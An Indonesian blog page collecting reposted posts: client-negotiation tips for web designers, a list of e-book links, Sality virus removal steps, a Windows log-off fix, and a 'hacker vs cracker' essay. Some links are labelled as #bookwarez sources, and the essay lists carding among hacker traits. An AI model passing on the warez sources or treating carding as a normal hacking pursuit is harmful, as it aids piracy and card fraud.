RSS

nice info computer,hacking,business, viruss,n many more

Rave's Blog

7 Tips cara bernegoisasi dengan tipikal klien yang berbeda

1. "Saya memiliki budget yang sangat terbatas, dan harga yang anda tawarkan terlalu mahal untuk saya"

Cara mengatasinya:

Jika orientasi anda adalah ingin mendapatkan banyak klien, ini bukanlah merupakan hal yang sulit. Anda bisa ambil job tersebut sesuai dengan budget klien. Tetapi, jika orientasi anda adalah hasil yang maksimal, anda sebaik nya tidak menerima job tersebut jika anda merasa job tersebut under budget.

Seorang web designer butuh hidup juga, banyak biaya hidup dan waktu yang di keluarkan untuk mengerjakan sebuah job. Lebih anda menolak job yang under budget dari range harga yang anda tetapkan.

Anda bisa mengatakan kepada client anda:

"Harga minimal yang bisa saya kasih untuk job requirment seperti itu sebesar Rp. xx.xxx.xxx,-. Saya akan dengan senang hati memberikan detail penawaran harga saya jika anda tertarik."

Jika client benar-benar suka dan ingin bekerja sama dengan anda, mereka akan mempertimbangkan kembali, jika tidak, bukan lah hal yang bijak jika anda menurunkan rate harga anda hanya untuk mendapatkan klien. Lebih baik anda menunggu job lain dengan rate yang anda tetapkan, daripada anda mengambil job dengan budget yang rendah.

Ada klien yang mengungkapkan bentuk penawaran dengan ucapan seperti ini:

"Ah...anak saya bisa mengerjakan website seperti itu dengan biaya hanya Rp.500.000, Saya hanya bisa memberikan budget maksimal sebesar Rp.x.xxx.xxx,- untuk job ini."

Dalam situasi seperti ini, penting untuk menjaga profesionalisme anda. Anda harus bisa menjelaskan ke klien, bahwa saya adalah seorang yang profesional, bukan seorang amatir, dan web yang saya hasilkan pun berkualitas.

2. "Saya sebenar nya bisa mengerjakan job ini sendiri, tapi..."

Client dengan tipikal seperti ini, menginginkan seorang yang sangat profesional untuk menyelesaikan job nya, atau seorang amatir yang memiliki keahlian sebanding dengan seorang profesional web designer. Jenis client seperti ini, biasa nya membuat kita membentuk sebuah pemikiran:

"Sebenar nya saya bisa mengerjakan job ini, maka saya tidak harus membayar mahal untuk ini."

Tipikal klien seperti ini biasanya merasa bahwa dia mampu mengerjakan job nya lebih baik dari pada kita, sehingga terkadang dia suka bersikap sombong, yang menyebabkan bahwa seolah-olah dia lebih kreatif dan membuat hasil kerja kita terlihat buruk.

Cara mengatasinya:

Jika saat ini saya sudah mempunyai cukup banyak job yang harus diselesaikan, saya secara umum akan melepas job ini, yang sudah pasti client akan menawarkan job ini dengan budget yang rendah. Dengan tipikal klien yang sombong seperti ini, akan membuat anda sulit menunjukan performa terbaik anda. Kita cukup mengatakan:

"Saya minta maaf, saat ini saya sedang menyelesaikan banyak job, dan mungkin saya tidak dapat mengerjakan job yang anda tawarkan"

Jika anda merasa stuck dengan tipikal klien "saya sebenarnya bisa mengerjakan job ini", ingatlah bahwa anda adalah seorang profesional dengan keahlian yang cukup. Anda perlu mengingat, bahwa dengan memberikan job ini kepada anda, tentunya si client tersebut mampu mengerjakan hal lain, karena job ini sudah diserahkan kepada ahlinya, yaitu anda. Jadi anda tidak perlu menyesal jika anda tidak mendapatkan job dari tipikal klien seperti ini.

3. "Ini terlihat membosankan, saya ingin sedikit lebih 'menarik' "

Pernyataan seperti ini biasanya sering terjadi terhadap sebuah desain. Entah itu desain website, logo, ataupun yang lain nya. Ada tipikal klien yang merasa bahwa hasil desain yang kita buat terlihat membosankan bagi dia, tapi dia sendiri tidak tau bagaimana cara menjelaskan apa yang dia inginkan.

Cara mengatasinya:

Berhati-hatilah dalam memvisualisasikan keinginan client. Anda harus bisa memastikan bahwa revisi yang anda buat haruslah terlihat menarik untuk desain yang anda buat secara keseluruhan. Anda lah yang membuat desain tersebut, jika anda sebagai seorang web designer merasa tidak puas terhadap karya yang anda buat karena keinginan client, maka hal ini pun tentu nya akan terlihat tidak menarik untuk orang lain. Terkadang memang selera orang berbeda-beda, yang menurut kita menarik, menurut orang lain tidak menarik.

Jika menurut anda keputusan client tersebut adalah hal yang salah, anda lebih baik memberitahukan kepada klien dengan alasan yang jelas, mengapa hal yang client inginkan tersebut adalah salah. Banyak situasi yang terjadi kemudian, client tersebut akan melihat bahwa anda adalah seorang yang ahli di bidang nya, dan mereka akan percaya terhadap desain yang anda buat, bahwa anda mampu memberikan hasil yang terbaik.

Memang bekerja dengan tipikal client seperti ini membutuhkan waktu yang banyak. Anda akan sering kali melakukan revisi karena ketidakpuasan client. Yang pasti, anda harus sabar menghadapi client seperti ini.

4. "Oh iya, saya juga ingin ditambahkan sistem seperti 'ini'..."

Keluar dari scope project: Merupakan sebuah mimpi buruk dari seorang web designer. Keluar dari requirment memang merupakan hal yang sangat menyebalkan. Dan ini sering saya rasakan sendiri. Kalau requirment tambahan client ga terlalu sulit sih ga masalah, cuma kalau sulit dan memakan waktu itu yang bikin kesel, apalagi kalau ga mau kasih fee tambahan, kecuali ada fee sesuai tingkat kesulitan nya, itu lain soal :)

Cara mengatasinya:

Buat MOU atau surat perjanjian yang jelas. Sertakan detail scope project yang anda kerjakan di dalam perjanjian tersebut. Dan jelaskan bahwa ada biaya tambahan jika client menginginkan requirment tambahan diluar scope awal project. Ini merupakan solusi yang ampuh, sehingga klien pun akan berpikir kembali jika dia ingin tambah ini itu, kecuali dia mau mengeluarkan kocek lebih. Jangan lupa surat perjanjian di tandatangani diatas materai.

5."Saya tidak ingin menggunakan cara anda dalam berkomunikasi atau sistem pembayaran anda. Mari lakukan dengan cara saya".

Anda baru saja memulai bisnis anda dengan klien. Ketika anda ingin menunjukan sistem kerja anda, client hanya ingin mengerjakan ini semua hanya dengan caranya.

Saya pernah mengalami hal seperti ini. Tidak ada salah nya anda sesekali mengikuti cara kerja client anda selama itu tidak merugikan anda. Asalkan keinginan klien tidak melanggar prinsip-prinsip dasar kerja anda, anda bisa ikuti cara mereka. Ini untuk menjaga hubungan baik dengan klien anda.

Contoh prinsip dasar dalam cara kerja saya adalah: Semua job yang saya kerjakan harus ada DP (down payment) terlebih dahulu, minimal 40%. Jika client ingin saya selesaikan dulu 100% baru mereka bayar, saya akan langsung menolaknya. Itu prinsip dasar cara kerja saya.

Cara mengatasinya:

Anda bisa mengatakan seperti ini:

"Saya mengerti darimana anda berasal, dan bagaimana cara anda biasanya dalam menjalankan bisnis anda. Tetapi saya sudah mempunyai sistem kerja sendiri. Dan alasan saya melakukan hal ini adalah, untuk melakukan bisnis saya secara lebih efektif, dan dapat menghasilkan yang terbaik untuk anda"

Saran saya: Jangan pernah langgar prinsip dasar kerja anda. Itu akan merugikan anda.

6. "Saya ingin dibuatkan website seperti website A. Dan saya ingin dibuatkan sama persis seperti itu, baik secara desain dan sistem"

Saya sering menerima client seperti ini. Memang biasa nya ada klien yang fanatik terhadap website tertentu, sehingga dia ingin website nya pun sama persis seperti itu. Tetapi dalam hal ini anda harus berhati-hati: Hal tersebut bisa melanggar copyright dan anda dituduh melakukan pembajakan.

Cara mengatasinya:

Anda jelaskan kepada client anda, bahwa hal tersebut bisa melanggar hak cipta. Dan itu akan berefek tidak bagus buat anda dan client.

Anda bisa mengatakan:

"Maaf, kalau sama persis seperti website A, saya tidak bisa, karena itu bisa melanggar hak cipta. Saya bisa buatkan dengan konsep desain seperti itu, bahkan saya bisa buatkan yang lebih menarik daripada itu".

Hal ini akan membuat client anda mengerti. Tentunya website yang anda hasilkan pun harus bisa lebih baik dari website A tersebut.

7. "Saya ingin website ini diselesaikan dalam 1 minggu ini. Kapan anda bisa menyelesaikannya?"

Banyak client yang berfikir bahwa mereka anda satu-satu nya priotias klien anda. Ada banyak hal yang harus anda kerjakan selain mengurus website client tersebut. Jangan membuat janji-janji kepada client dimana anda tidak dapat memenuhi janji tersebut. Anda harus membuat schedule yang benar, agar semua project anda bisa berjalan lancar.

Cara mengatasinya:

Beritahukan kepada client anda, bahwa saat ini anda sedang menyelesaikan beberapa project juga. Berikan waktu realistis anda kepada client kapan anda bisa menyelesaikan project tersebut. Jika client tersebut tidak bisa menerima waktu yang anda tawarkan, lebih baik anda membiarkan client tersebut mencari web designer yang lain.

Hal ini penting untuk menjaga kualitas kerja anda dan kepercayaan client terhadap anda. Jangan memberikan janji yang tidak bisa anda penuhi.

Anda punya pengalaman serupa? Silahkan sharing melalui kolom komentar.

Semoga bermanfaat...

Terimakasih

Referensi produk bisnis online untuk anda:
READ MORE - 7 Tips cara bernegoisasi dengan tipikal klien yang berbeda

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Collection Link E-book

List of free E-books O'Reilly online
http://www.oreilly.com/openbook/
http://sysadmin.oreilly.com/

Computer books and manuals
http://www.hoganbooks.com/freebook/webbooks.html
http://www.informit.com/itlibrary/
http://www.fore.com/support/manuals/home/home.htm
http://www.adobe.com/products/acrobat/webbuy/freebooks.html

The Network Book
http://www.cs.columbia.edu/netbook/

Some #bookwarez.efnet.irc links
http://www.extrema.net/books/links.shtml

Some #bookwarez.efnet.irc fiction
http://194.58.154.90:4431/enscifi/

Pimpas online books (Indonesia)
http://202.159.16.55/~pimpa2000
http://202.159.15.46/~om-pimpa/buku

Security, privacy and cryptography
http://theory.lcs.mit.edu/~rivest/crypto-security.html
http://www.oberlin.edu/~brchkind/cyphernomicon/

My own misc online reading material
http://www.eastcoastfx.com/docs/admin-guides/
http://www.eastcoastfx.com/~jorn/reading/

Computer books
http://solaris.inorg.chem.msu.ru/cs-books/
http://sweetrude.net/~cab/books/
http://alaska.mine.nu/books/
http://poprocks.dyn.ns.ca/dave/books/
http://58-160.skarland.uaf.edu/books/
http://202.186.247.194/~ebook/
http://hooligans.org/reference/

Linux documentation
http://www.linuxdoc.org/docs.html

FreeBSD documentation
http://www.freebsd.org/tutorials/

Sun documentation
http://osiris.imw.tu-clausthal.de:8888/
http://uran.vvsu.ru:8888/

SGI documentation
http://newton.unicc.chalmers.se/ebt-bin/nph-dweb/dynaweb;td=2
http://techpubs.sgi.com/library/tpl/cgi-bin/init.cgi

IBM Online Redbooks
http://www.redbooks.ibm.com/

Digital Unix documentation
http://www.unix.digital.com/faqs/publications/base_doc/DOCUMENTATION/V40D_HTML/V 40D_HTML/LIBRARY.HTM

Filesystem Hierarchy Standard
http://www.pathname.com/fhs/2.0/fhs-toc.html
http://www.linuxbase.com/

UNIX stuff
http://www.ucs.ed.ac.uk/~unixhelp/index.html
http://www.uwsg.indiana.edu/usail/
http://www.isu.edu/departments/comcom/unix/workshop/unixindex.html |
http://www.franken.de/users/lorien/unix.html
http://www.cs.buffalo.edu/~milun/

unix.programming.html Programmers reading
http://www.programmersheaven.com/
http://www.cs.monash.edu.au/~alanf/se_proj97/

Programming Perls 2nd edition
http://www.cs.bell-labs.com/cm/cs/pearls/

C stuff
http://www.strath.ac.uk/CC/Courses/NewCcourse/ccourse.html
http://www.cm.cf.ac.uk/Dave/C/CE.html
http://www.cprogramming.com/tutorial.html
http://www.cs.virginia.edu/c++programdesign/slides/
http://www.icce.rug.nl/docs/cplusplus/cplusplus.html

Perl stuff
http://www.webdesigns1.com/perl/ir.html
http://www.ictp.trieste.it/texi/perl/perl_toc.html
http://www.itknowledge.com/tpj/
http://www.plover.com/~mjd/perl/

Java stuff
http://www.cs.brown.edu/courses/cs016/book/
http://polaris.cis.ksu.edu/~schmidt/CIS200/
http://www.daimi.au.dk/dProg1/java/langspec-1.0/index.html

Lisp stuff
http://www.cs.cmu.edu/afs/cs.cmu.edu/project/airepository/ai/html/cltl/mirrors.html
http://www.cs.tulane.edu/www/Villamil/lisp/

Ada stuff
http://www.adahome.com/Tutorials/

Database reading
http://www.bus.orst.edu/faculty/brownc/lectures/db_tutor/index.htm

SQL stuff
http://w3.one.net/~jhoffman/sqltut.htm
http://www.doc.mmu.ac.uk/STAFF/E.Ferneley/SQL/index.htm
http://www.daimi.au.dk/~oracle/sql/index.html

Visual Basic stuff
http://www.vb-world.net/books/

Handbook of Applied Cryptography
http://www.cacr.math.uwaterloo.ca/hac/

X Window System
http://tronche.com/gui/x/ h
http://www.cen.com/mw3/refs.html
http://www.gaijin.com/X/

GTK and Gnome stuff
http://developer.gnome.org/doc/GGAD/ggad.html

QT and KDE stuff
http://www.troll.no/qt/
http://developer.kde.org/documentation/tutorials/index.html
http://www.arrakis.es/~rlarrosa/tutorial.html

Corba stuff
http://www.iona.com/hyplan/vinoski/

TCP/IP info
http://www.tunix.kun.nl/ptr/tcpip.html

Misc programmers reading
http://www.cs.wisc.edu/~chilimbi/Pubs.html
http://www.ic.arizona.edu/~nromano/spring99/readings.htm

Some useful tech articles
http://www.sysadminmag.com/
http://www.dotcomma.org/

Considering Hacking Constructive
http://www.firstmonday.dk/issues/issue4_2/gisle/index.html

Eric's Random Writings
http://www.tuxedo.org/~esr/writings/

IBM's History
http://www.ibm.com/ibm/history/story/text.html

Electronic Publishing
http://www.civeng.carleton.ca/~nholtz/ElectronicPublishing.html

Digital processing
http://www.dspguide.com/pdfbook.htm

The Hardware Book
http://sunsite.auc.dk/hwb/

Network iQ Router Reference Manual
http://www.teltrend.co.nz/documentation/networkiq/rel74/html/rmtoc.htm

Cisco Product Documentation
http://www.cisco.com/univercd/cc/td/doc/product/

Novell developers appnotes
http://developer.novell.com/research/appnotes/

Icons for your desktop
http://nether.tky.hut.fi/iconstore/

Symbols and signs and ideograms and stuff
http://www.symbols.com/ Dictionaries
http://www.ohiolink.edu/db/oed.html
http://www.ohiolink.edu/db/ahd.html
http://www.ohiolink.edu/db/columbia.html
http://www.ohiolink.edu/db/thes.html
http://www.eb.com:180/

Misc reading material
http://dali.orgland.ru/tcd/
http://www.ud.se/english/press/pdf_publ.htm

Dantes Inferno
http://sophia.smith.edu/~lkleinbe/dante/home.html
http://www.divinecomedy.org/

Books and texts
http://digital.library.upenn.edu/books/
http://www.cs.cmu.edu/books.html
http://www.ipl.org/reading/books/
http://www.nakedword.org/
http://sunsite.berkeley.edu/alex/

Literature stuff
http://lion.chadwyck.co.uk:8080/
http://www.swan.ac.uk/uwp/lit.htm

Octavo books
http://www.octavo.com/

Project Gutenberg - books and texts
http://www.promo.net/pg/

Project Runeberg - Scandinavian in books and texts
http://www.lysator.liu.se/runeberg/katalog.html

The Elements of Style
http://www.bartleby.com/141/index.html

Bigtext - illustrated books and manuals for DOS
http://www.ozemail.com.au/~kevsol/oldfav.html

#bigtext Breeze - a complete text system for Windows
http://www.ozemail.com.au/~kevsol/sware.html

#brzwin Language links
http://www.june29.com/HLP/

Grimms' fairy tales
http://www.nationalgeographic.com/grimm/archive.html

Winnie the Pooh
http://www.machaon.ru/pooh/

Seven Wonders of the World
http://ce.eng.usf.edu/pharos/wonders/

Medieval history
http://www.fordham.edu/halsall/sbook2.html

Misc history
http://www.usaor.net/users/ipm/contents.html
http://www.homeusers.prestel.co.uk/littleton/re0_cath.htm

Stonehenges Legends
http://www.missgien.net/stonehenge/legends.html

In Parentheses historical papers
http://www.inpar.dhs.org/

Bulfinchs Mythology
http://www.bulfinch.org/

The Dead Sea Scrolls
http://lcweb.loc.gov/exhibits/scrolls/toc.html

Qumran historical site
http://www.kalia.org.il/Qumran/

Index of cults
http://www.totentanz.de/kmedeke/cults.htm

Heretical speculation
http://www.calweb.com/~queribus/gnosticgnus.html

The esoteric Ordo Supremus Militaris Templi Hierosolymitani
http://www.osmth.org/index.html

Runes and Norse stuff
http://www.multiart.nu/grimner/
http://www.eastcoastfx.com/~jorn/runes/

Extinction level events
http://members.xoom.com/korwisi/ele/english/index.html
http://impact.arc.nasa.gov/
http://www.boulder.swri.edu/clark/ncar.html

Stephen Hawkings Universe
http://www.pbs.org/wnet/hawking/html/home

html The constellations
http://www.dibonsmith.com/constel.htm

Falling into a black hole
http://casasrv.colorado.edu/~ajsh/schw.shtml

Gravity is a push
http://www.epicom.com/gravitypush/

Online audiobooks
http://www.broadcast.com/books/scifi/

ElecBooks
http://www.elecbook.com/eblist.htm

NewMedia Classics
http://www.newmediaclassics.com/

Online Books Archive
http://docs.online.bg/

Internet Public Library
http://www.ipl.org/

Rocket-Library.com
http://www.rocket-library.com/categories.asp

PalmPilot E-Text
Ring http://www.webring.org/cgi-bin/webring?ring=pilot_text&id=2&List

Virtual Free Books
http://www.virtualfreesites.com/free.books.am.html

About Ebooks
http://aalbc.com/ebooks/Allaboutebooks.htm
 
sumber : DonKomo
READ MORE - Collection Link E-book

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Basmi Virus Sality

Tidak semua program antivirus dapat membersihkan file yang sudah terinfeksi virus W32/Sality.AE. Malah bisa-bisa, file tersebut akan rusak setelah di-scan dan dibersihkan oleh antivirus yang tidak tepat.

Virus Sality akan menyebar dengan cepat melalui jaringan dengan memanfaatkan default share Windows atau share folder yang mempunyai akses full dengan cara menginfeksi file yang mempunyai ekstensi exe/com/scr.

Untuk itu, perusahaan sekuriti Vaksincom menyarankan pengguna komputer untuk menonaktifkan Default Share (C$, D$ .. dst) dan hindari full sharing folder Anda di jaringan.

Berikut 9 cara singkat membersihkan virus W32/Sality.AE yang diterima detikINET dari analis virus Vaksincom, Adang Jauhar Taufik, Rabu (4/3/2009):

1. Putuskan hubungan komputer yang akan dibersihkan dari jaringan dan internet.

2. Matikan System Restore selama proses pembersihan berlangsung.

3. Matikan Autorun dan Default Share. Silahkan download file berikut kemudian jalankan dengan cara: klik kanan repair.inf lalu install.

4. Matikan program aplikasi yang aktif di memori agar proses pembersihan lebih cepat terutama program yang ada dalam daftar startup.

5. Sebaiknya scan dengan menggunakan removal tools dengan terlebih dahulu merubah ekstensi dari removal tools tersebut dengan ekstensi lain [contoh: CMD] agar tidak diinfeksi ulang oleh W32/Sality.AE.

6. Agar komputer yang sudah terinfeksi W32/Sality.AE dapat booting safe mode, silahkan restore registry yang sudah diubah oleh virus.

Silahkan download file berikut kemudian jalankan sesuai OS yang terinfeksi W32/Sality.AE tersebut.

7. Fix registry lain yang diubah oleh virus, silahkan download tools berikut kemudian jalankan file tersebut dengan cara: klik kanan repair.inf lalu install

8. Restart komputer dan scan ulang dengan menggunakan removal tools untuk memastikan komputer telah bersih dari virus.

9. Untuk pembersihan optimal dan mencegah infeksi ulang sebaiknya install dan scan dengan antivirus yang dapat mendeteksi Sality dengan baik.


sumber :  Via
READ MORE - Basmi Virus Sality

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Mengatasi windows yang selalu Log off

Well....utk artikel ini saya hanya repost dari blog teman forum saya,karena kemarin teman saya yang konsultasi dengan saya tentang permasalahan dengan komputer nya yang selalu LOG OFF.Okey ini dia brader solusi nya:


caranya sbb :

1. masuk ke save mode ( tekan F8 saat mau login windows)
2. copy userinit.exe kedalam c:\windows\
3. restart komputer.... beres deh....
4. semoga berhasil....
READ MORE - Mengatasi windows yang selalu Log off

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Hacker or Cracker


   Hacking 
Hacking adalah pekerjaan yang dilakukan secara cepat dan berhasil, walau tidak sempurna. Suatu hal Mustahil, dan mungkin menghabiskan banyak waktu tetapi
menghasilkan yang diinginkan untuk membuktikan baik secara emosional ataupun fisik bahwa ini bisa dilakukan. Kegiatan hacking dilakukkan secara bersungguh-sungguh, dengan ketelitian yang tinggi dalam berinteraksi dengan komputer dalam bermain dan bereksplorasi
Hacker adalah Seseorang yang sangat senang mengeksplorasi suatu program dari suatu system untuk untuk mengetahui batas kemampuannya, dengan mengunakan cara-cara dasar yang akan digunakan oleh orang yang tidak mengerti dan mengetahui bagaimana program itu dibuat dan dengan pengetahuan minimum
terhadap program.  Hacker adalah seorang yang sangat antusias dalam membuat program, dan lebih menikmati membuat program dibandingkan berteori tentang program

Kemampuan atau Skill dari Hacker serta gaya hidup Hacker :
  • Ahli pemrograman, baik itu bahasa C,java,ajax,assembly,PHP,maupun C# yang jelas mengusai lebih dari 2 bahasa pemrograman.
  • Secara sembunyi-sembunyi berusaha menemukan informasi penting dengan cara menjelajah, lebih sering di sebut sebagai cracker.
  • Melakukan Hacking  maupun Carding dengan tujauan pribadi
  • Senang dengan tantangan intelektual dengan ide kreatif rata-rata mempunyai logika yg tinggi
  • Telah melewati tahap newbie atau  tahap dasar hacker.
  • Bisa atau menguasai minimal 3 Sistem operasi,Windows,Linux,dan Free Bsd
Cracking

Cracking adalah kegiatan.memaksa masuk kedalam suatu sistem, menghilangkan copy protection,
atau merusak suatu aplikasi dengan berbasis keygen atau Serial number.
orang yang melakukan kegiatan Cracking ini disebut Cracker.Biasa nya cracker melakukan aksi nya 
dalam bentuk kejahatan.Misalnya mendeface suatu website sehingga web tersebut tidak bisa di akses
serta merusak sistem database web atau  suatu forum,dengan tujuan atau motivasi tertentu.

Etika & Aturan main Hacker


  • Di atas segalanya, hormati pengetahuan & kebebasan informasi.
  • Memberitahukan sistem administrator akan adanya pelanggaran keamanan/lubang di keamanan yang anda lihat.
  • Jangan mengambil keuntungan yang tidak fair dari hack.
  • Tidak mendistribusikan & mengumpulkan software bajakan.
  • Tidak pernah mengambil resiko yang bodoh selalu mengetahui kemampuan sendiri.
  • Selalu bersedia untuk secara terbuka/bebas/gratis memberitahukan& mengajarkan berbagai informasi & metoda yang diperoleh.
  • Tidak pernah meng-hack sebuah sistem untuk mencuri uang.
  • Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
  • Tidak pernah secara sengaja menghapus & merusak file di komputer yangdihack.
  • Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.

Hirarki Hacker

Mungkin agak terlalu kasar jika di sebut hirarki / tingkatan hacker; istilah ini tidak sepenuhnya bisa di terima oleh masyarakat hacker.  Secara umum yang paling tinggi (suhu) hacker sering di sebut ‘Elite’; di Indonesia mungkin lebih sering di sebut ‘suhu’.Sedangkan, di ujung lain derajat hackerdikenal ‘wanna-be’ hacker atau dikenal sebagai ‘Lamers’.

Elite

Juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka mengerti sistemoperasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global.
Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya effisien & trampil,menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui, walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu mengikuti peraturan yang ada.

Semi Elite

Hacker ini biasanya lebih muda daripada Elite.Mereka juga mempunyai kemampuan & pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecil program cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh hacker kaliber ini, sialnya oleh para Elite mereka sering kali di kategorikan Lamer.

Developed Kiddie

Sebutan ini terutama karena umur kelompok ini masih muda (ABG)&masih sekolah.  Mereka membaca tentang metoda hacking & caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya.Umumnya mereka masih menggunakan Grafik UserInterface (GUI) & baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.

Script Kiddie

Seperti developed kiddie, Script Kiddie biasanya melakukan aktifitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.

Lamer

Mereka adalah orang tanpa pengalaman & pengetahuan yang ingin menjadi hacker (wanna-be hacker). Mereka biasanya membaca atau mendengar tentang hacker & ingin seperti itu. Penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit. Biasanya melakukan hacking menggunakan software trojan, nuke & DoS. Biasanya menyombongkan diri melalui IRC channel dsb. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.

Tips Menjadi Hacker

Untuk menjadi Hacker, yang diperlukan pertama sekali adalah keinginan. Karena yang jadi pertanyaan bukanlah ‘Apakah saya akan menjadi seorang Hacker ?’, tetapi ‘Apakah saya ingin menjadi seorang Hacker ?’. Jika anda telah memiliki keinginan, maka anda telah memiliki sebuah modal dasar sebagai pijakan anda anda dalam melangkah.
Segala sesuatu pasti dimulai dari impian, dan sudah pasti jika anda memiliki impian, anda akan mencoba untuk merealisasikannya. Intinya, sebelum melangkah yakinkan kalau anda telah miliki keinginan.

Pelajari bahasa pemprograman

Hal pertama yang harus anda pelajari adalah bahasa pemprograman. Saat ini di dalam distribusi sistem operasi Linux, terdapat beragam tool-tool berguna yang akan menunjang anda untuk belajar memprogram. Untuk mendapatkan Linux saat ini sudah sangat mudah, anda bisa membelinya secara online (www.gudanglinux.or.id), mendapatkan Copy-an CD nya dari teman. Atau jika anda mempunyai akses internet yang baik, anda bisa langsung mendownload distribusi linux situs resmi-nya, atau melalui www.linuxiso.com. Menurut Eric S. Raymond, bahasa pemprograman yang baik untuk anda pelajari pertama sekali adalah ‘Python’. “Desain-nya bersih, terdokumentasi dengan baik dan cukup mudah bagi pemula”

Pelajari dan kembangkan salah satu Unix OpenSource.

Mengapa Linux/Unix OpenSource begitu penting ? Ini semua tidak lepas dari semangat OpenSource itu sediri. Dengan mempelajari kode-kode yang dirilis bebas dalam sistem operasi OpenSource, kita dapat mempelajari pola pikir seorang programmer/Hacker, kita dapat menemukan cara mereka dalam meyelesaikan masalah dan mencoba mencari metoda penyelesaian masalah yang lebih baik dari apa yang mereka lakukan. OpenSource juga membantu kita dalam membangun sebuah aplikasi, sehingga kita tidak perlu direpotkan dengan ‘research’. Mereka telah melakukan-nya untuk kita, dan kita bisa memanfaatkan waktu yang tersisa untuk hal yang lebih spesifik.
“Saya bisa berpandangan jauh, karena saya berdiri di pundak orang-orang jenius terdahulu .. ” [Sir Isaac Newton]

Pelajari hal-hal baru

Banyak hal-hal baru muncul, dan setiap hal (apapun) akan memberikan kita pelajaran berarti untuk hidup dan hidup adalah HACKING. Hindarilah untuk bersikap skeptis dan mulailah untuk berpikiran terbuka. Hal-hal baru -terlebih-lebih yang begitu radikal-, banyak di tentang oleh sebagian orang skeptis, namun sebuah pemikiran terbuka akan memberikan alur yang baik dalam memperolah ilmu. Ilmu ada dimana-mana. Bahkan dalam suatu yang dianggap kotor. Sebagai contoh, coba anda bandingkan ‘kotoran’ sapi (hewan herbivora) dengan ‘kotoran’ kucing (hewan karnivora). Dapat kita lihat kalau kotoran sapi ‘lebih menggunung’ dari pada kotoran kucing, dan tidak terlepas dari itu, secara umum dapat kita tarik kesimpulan, bahwa hewan herbivora (pemakan tanaman) lebih banyak dari pada hewan karnivora (pemakan daging). Penyebab yang paling relevan untuk hal ini adalah faktor ‘makanan’. Tumbuhan yang dikonsumsi oleh hewan herbivora (dalam contoh ini sapi) mengandung ‘selulose’ atau serat lebih sulit dicerna, sehingga lebih banyak meninggalkan zat sisa. Hal ini tidak berlaku pada hewan karnivora (dalam contoh ini kucing). Daging lebih mudah dicerna, sehingga hanya meninggalkan sedikit zat sisa.
Dengan sedikit imajinasi kotor, coba bayangkan hal-hal yang lebih kotor lagi untuk dianalisa dan diambil pelajarannya. Dalam lingkup komputer, pelajarilah semua hal-hal baru. Anda bisa menemukan banyak hal baru melalui artikel, journal, atau berita-berita ‘nerd’ di ‘slashdot’.

Selalu gunakan logika

Berpikir dengan logika sangat diperlukan dalam Hacking. Dalam Hacking anda akan berhadapan dengan berbagai keadaan untuk dianalisa dan dipecahkan secara logika. Logika akan sangat membantu anda untuk menghidupkan kembali rasionalitas yang hilang dan berpikir membantu anda untuk hidup dan tetap hidup.

Ikuti perkembangan teknologi dan informasi

Teknologi Informasi berkembang sangat cepat. Sebuah bahasa pemprograman yang kita pelajari hari ini bisa cepat berganti dengan bahasa atau visual programming baru yang lebih mudah –baca memudahkan, alih-alih membodohkan-. Semua itu berganti seiring berlalunya waktu dan ketika kita tersadar kita sudah jauh ketinggalan.
Ada baiknya anda selalu membaca, atau minimal mendapatkan ‘digest’ dari ilmu-ilmu/info terbaru. Anda juga bisa mendapatkan informasi dari Mailing List dan NewsGroup. Dengan selalu up-to-date, anda akan selalu dekat dengan informasi.

Ketahui hal-hal yang belum diketahui

Dalam apapun didunia ini, kita harus bercermin. Buang semua prasangka dan nilai-nilai. Buang anggapan sepihak kalau ‘saya adalah seorang wizard’. Duduklah sejenak dan mulai berpikir.


Mengabdi kepada budaya Hacker

Setelah semuanya selesai dan anda sedang beristirahat setelah aktifitas Hacking 37 Jam yang melelahkan. Coba ingat kembali.
  • Siapa yang memperkenalkan anda kepada komputer ?
  • Siapa yang membimbing anda mempelajarinya ?
  • Siapa yang dengan setia menemani anda mengejar informasi ?
  • Siapa yang pertama sekali mengenalkan anda dengan HACKING ?
  • Siapa yang mengajari anda teknik-teknik Hacking Dasar ?
  • Siapa yang mengajari anda tentang bersikap dan berfikir layaknya HACKER ?
  • Siapa yang membuat sistem operasi Hacker, Linux ?
  • Siapa yang mengembangkannya ?
Jangan pernah cepat puas,tetapi ingatlah jangan pernah menjadikan anda besar kepala atau sombong.Ingatlah saat anda dahulu berada di titik 0.Gunakan ilmu yang anda kuasai dengan bijak dan membantu sesama.Cukuplah untuk pengetahuan,Kenap...?karena tiudak kehidupan yang jelas dari seorang hacker.Apalagi hingga menjadi mafia/cyber crime.










READ MORE - Hacker or Cracker

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Hacker or Cracker


   Hacking 
Hacking adalah pekerjaan yang dilakukan secara cepat dan berhasil, walau tidak sempurna. Suatu hal Mustahil, dan mungkin menghabiskan banyak waktu tetapi
